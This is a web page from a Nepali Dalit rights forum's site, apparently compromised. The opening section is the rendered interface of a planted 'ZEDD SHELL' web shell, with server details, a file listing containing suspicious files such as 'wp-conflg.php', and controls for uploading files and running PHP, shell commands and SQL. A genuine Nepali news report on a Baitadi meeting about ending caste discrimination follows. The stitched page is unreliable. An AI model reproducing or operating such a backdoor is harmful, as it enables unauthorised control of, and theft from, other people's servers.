관리-도구

경로: /home2/nepaldsdforg/public_html/public/uploads/cover_image

/home2/nepaldsdforg/public_html/public/uploads/cover_image/

폴더 내용:


파일 업로드:


PHP 코드 실행:


ZEDD SHELL Uname: Linux 22b.websitewelcome.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User: 10847 (nepaldsdforg)
Group: 9989 (nepaldsdforg)
Disable functions: NONE :)
Safe mode: On[ PHPinfo ]
      ( Reset | Go to )
sFileSizeTanggalOwner/GroupPermissionsActions
[ . ] 24 Apr 2025, 04:11 10847 0755
[ .. ] 26 Apr 2025, 02:19 10847 0750
[ backend ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ css ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ frontend ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ js ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ pages ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ static_img ] 24 Apr 2025, 03:51 10847 0755 Zip | Hapus
[ storage ] 24 Apr 2025, 20:13 10847 0755 Zip | Hapus
[ uploads ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ vendor ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
.htaccess 624 b 24 Apr 2025, 04:05 10847 0444 Download | Rename | Kosong | Delete
cw1768.zip 1.82 Kb 24 Apr 2025, 03:19 10847 0644 Download | Rename | Kosong | Delete
error_log 20.26 Kb 24 Apr 2025, 03:20 10847 0644 Download | Rename | Kosong | Delete
favicon.ico 0 b 26 Jul 2023, 12:54 10847 0644 Download | Rename | Kosong | Delete
index.php 1.73 Kb 24 Apr 2025, 04:05 10847 0444 Download | Rename | Kosong | Delete
info.php 17.30 Kb 24 Apr 2025, 04:11 10847 0644 Download | Rename | Kosong | Delete
jwy.txt 1 b 24 Apr 2025, 03:19 10847 0644 Download | Rename | Kosong | Delete
mix-manifest.json 75 b 26 Jul 2023, 12:54 10847 0644 Download | Rename | Kosong | Delete
nony.php 3.50 Kb 24 Apr 2025, 04:11 10847 0644 Download | Rename | Kosong | Delete
robots.txt 965 b 26 Apr 2025, 18:27 10847 0644 Download | Rename | Kosong | Delete
web.config 1.18 Kb 26 Jul 2023, 12:54 10847 0644 Download | Rename | Kosong | Delete
wp-conflg.php 1.24 Kb 24 Apr 2025, 03:12 10847 0644 Download | Rename | Kosong | Delete

File Baru | Folder Baru
Command
SQL
?> Dalit Society Development Forum

जातीय भेदभाव अन्त्य गर्न शसक्त अभियान चलाउनुपर्ने

DSDF Baitadi 2024 Feb 07

जातीय भेदभाव अन्त्य गर्न शसक्त अभियान चलाउनुपर्ने

बैतडी, 
बैतडी जिल्लामा जातीय भेदभाव तथा छुवाछुत अन्त्यका लागि शसक्त रुपले अभियान चलाउनुपर्ने सरोकारवालाले बताएकाछन् । सुक्रबार जिल्ला प्रशासन कायाएलयमा जातिय भेदभाव अन्त्य सम्वन्धी भएको अन्तरकृयाका सहभागीले जातीय भेदभाव तथा छुवाछुतको भयानक स्थीति कायमै रहेको बताएकाछन् । 

मानव अधिकारकर्मी सरस्वती नेपालीले बैतडीमा धारा, मन्दीर र होटलमा मात्रै नभई सरकारी कार्यालयहरुमा समेत जातीय विभेद कायम रहेको बताइन् । उनले भनिन्,‘दलित कार्यालय सहयोगीलाई चिया÷खाजा वितरणमा रोक लगाउने गरिन्छ । दलित कार्यालय सहयोगीलाई सरसफाईका काममा प्रयोग गरिन्छ तर कर्मचारीका लागि चिया पकाउने वा खाजा ल्उाने कामबाट बन्चीत गरिन्छ । दलित कार्यालय पमुखले भान्से पाउनै मुस्कील छ । हिजोका दिनमा तँ भन्नेबाट तिमि भन्नेसम्म पुगेको छ तर विभेद पटक्कै हटेको भन्ने होइन् । मन्दीर, धारा र होटलमा सामाजिक क्षेत्रमा सक्रिय व्यक्ति बाहेकलाई  पराम्परागत शैलीमै विभेद गरिन्छ, दलित जनप्रतिनिधीहरुले समेत आफ्नै सहकर्मीबाट विभेद सहनुपर्ने बाध्यता छ ।’

sar 11706940284.jpgपुर्व वडासदस्य पार्वती भुलले दलित महिला सदस्यहरुलाई वडाअध्यक्षले माइनटमा बाटोमै हस्ताक्षर गराउने गरेको सुनाइन् । हरेक निर्णयहरु मनलाग्दी ढंगबाट गरेर दलित सदस्यलाई फकाएर हस्ताक्षर गराउने गरेको दुखेको सुनाइन् । 
दशरथचन्द नगरपालिकाका कार्यपालिका सदस्य प्रेम दयालले सबैभन्दा बढी छुवाछुत दशरथचन्द नगरपालिकामा कायम रहेको बताए । उनले कार्यपालिकाकै बैठकमा विभेद खेप्दै आएको दुखेको पोखे । उनले बैठक चलिरहकै अवस्थामा समेत जनप्रतिनिधिबाट विभेदजन्य शब्दहरु प्रयोग हुदैँ आएको सुनाए । दलितको बजेट प्रभावकारी कार्यान्वयनमा जनप्रतिनिधिको चासो नभएको उनको भनाई छ । “नजान्ने व्यक्तिभन्दा जान्नेबुझ्ने पढेलेखेका कर्मचारीबाट बढि विभेद गरिन्छ, कार्यालयमा कामगर्न जादाँ दलितको काममा बढी ढिलासुस्ती गर्ने, नागरिकता बनाउन जाने बेला होच्याउने नाम राखिदिने, विद्यालयमा एक शिक्षकले दलित विद्यार्थीको हातै टुटाइदियो, कोहि शिक्षकले दलित विद्यार्थीलाई पढाउदाँ होच्याउने शब्दहरु प्रयोग गर्ने, ठुलो पदमा रहेका दलितले सानो पदमा रहेकाहरुलाई पहिला नमस्कार गर्नुपर्ने अवस्था छ । यो अवस्था कायम रहेमा म सबैको नाममा मुद्धा दायर गर्छु मलाई प्रशासनले साथ दिनुपर्छ ।” उनले भने ।

अधिवक्ता गोर्वधन नाथले जातीय भेदभाव तथा छुवाछुत गर्ने व्यक्तिलाई २बर्ष सम्म जेल सजायको व्यवस्था रहेको बताए । बैतडीमा हालसम्म जातीय विभेद सम्बन्धी २वटा मुद्धामा कारवाही भएको उनले बताए । 

प्रमुख जिल्ला अधिकारी भिमाकान्त शर्माले बैतडीमा जातीय विभेदको अन्त्य गर्नका लागि आफु शसक्त रुपले अघि बढ्ने बताए । उनले भने, “यस बिषयमा हामी हरेक महिनाको १ पटक बैठक गरौँ, पालैपालो समस्याहरुको समाधान गर्ने योजना बनाऔँ, अन्य विषमा भन्दा यस सम्वन्धीका मुद्धाहरुमा बलियो ढंगबाट कारवाही गर्न हामी सक्रिय हुन्छौँ, समस्याहरुको पहिचान गर्नमा अधिकारकर्मी र पत्रकारहरु सहयोग गर्नुस्, सबै सरोकारवाला निकाय संगको समन्वयमा समस्याको सामुहिक पहलबाट समाधान गरौँ । यस बिषयमा एकदुई स्टेप अगाडी बढेर काम गर्न न काम म तत्पर छु ।”

prasasan1706940344.jpgदशरथचन्द नगरपालिकाका प्रमुख प्रशासकीय अधिकृत जगदीश जोशीले जातीय भेदभावको अन्त्य नभएसम्म कुनैपनि विकास निर्माण सम्भव नभएको बताए । परापुर्व कालमा विभदे नभएपनि बाठाँ मान्छेले अर्का माथी आफ्नो हक जमाउनका लागि विभेद गर्ने गरेको उनले बताए । विभेदको अनत्य गर्नका लागि नगरपालिकाका तर्फबाट खेल्न सकिने भुमिका प्रभावकारी ढंगले निर्वाह गर्ने यनको भनाई छ । अधिकारकर्मी बलभद्र दयालले जातीय भेदभाव अन्त्यका लागि सबै सरकारी तथा गैर सरकारी  निकायहरु लागिपरेमा समस्या समाधान गर्न सकिने बताए । 

dsp1706940371.jpg